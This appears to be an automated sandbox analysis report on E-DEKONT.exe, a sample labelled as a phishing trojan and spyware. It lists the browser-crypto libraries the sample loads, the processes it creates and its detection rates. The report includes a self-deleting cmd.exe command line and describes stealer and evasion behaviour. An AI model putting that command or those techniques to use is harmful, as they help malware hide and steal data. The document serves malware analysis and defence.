                  Source: E-DEKONT.exe, 00000004.00000003.108940489498.000000001E72C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108943979243.000000001E774000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108945064477.000000001E7AC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108943865478.000000001E770000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108938291383.000000001DDD8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108897608996.000000001DDC4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108889973154.000000001DDC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108913399205.000000001DDCC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108940250648.000000001E728000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108938541582.000000001DDC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108889185436.000000001DDC4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108940858034.000000001E734000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108943398108.000000001E764000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108902878047.000000001DDC4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108895399238.000000001DDC4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000002.109036371448.000000001E380000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108944759936.000000001E7A8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108908941995.000000001DDCC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108886923210.000000001DDC8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108892004613.000000001DDCC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108939281482.000000001E708000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108943738244.000000001E76C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108944495518.000000001E78C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108939672315.000000001E714000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108891891978.000000001DDC8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108904933284.000000001DDC8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108884231351.000000001DDC4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108912726161.000000001DDC4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108943576314.000000001E768000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108945279969.000000001E7C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108945375034.000000001E7C4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108885630583.000000001DDC4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108919075540.000000001D4D4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108898625241.000000001DDC8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108917692756.000000001DDC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108896445391.000000001DDC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108944687963.000000001E79C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108939473726.000000001E70C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108904797866.000000001DDC8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108911467372.000000001DDCC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108934547678.0000000000060000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108944279818.000000001E784000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108939584393.000000001E710000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108919898776.000000001DDC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108907116476.000000001DDC4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108899797081.000000001DDCC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108905955571.000000001DDC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108931941329.000000001E7D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs E-DEKONT.exe
                  Source: C:\Users\user\Desktop\E-DEKONT.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeSection loaded: crtdll.dllJump to behavior
                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dllJump to behavior
                  Source: E-DEKONT.exeVirustotal: Detection: 26%
                  Source: E-DEKONT.exeReversingLabs: Detection: 20%
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile read: C:\Users\user\Desktop\E-DEKONT.exeJump to behavior
                  Source: E-DEKONT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\E-DEKONT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\E-DEKONT.exe C:\Users\user\Desktop\E-DEKONT.exe
                  Source: C:\Users\user\Desktop\E-DEKONT.exeProcess created: C:\Users\user\Desktop\E-DEKONT.exe C:\Users\user\Desktop\E-DEKONT.exe
                  Source: C:\Users\user\Desktop\E-DEKONT.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "E-DEKONT.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
                  Source: C:\Users\user\Desktop\E-DEKONT.exeProcess created: C:\Users\user\Desktop\E-DEKONT.exe C:\Users\user\Desktop\E-DEKONT.exeJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "E-DEKONT.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3 Jump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403373
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\YdervggJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\nsq7CBC.tmpJump to behavior
                  Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@8/55@2/2
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_004020FE CoCreateInstance,1_2_004020FE
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_004046E6 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_004046E6
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL id FROM %s;
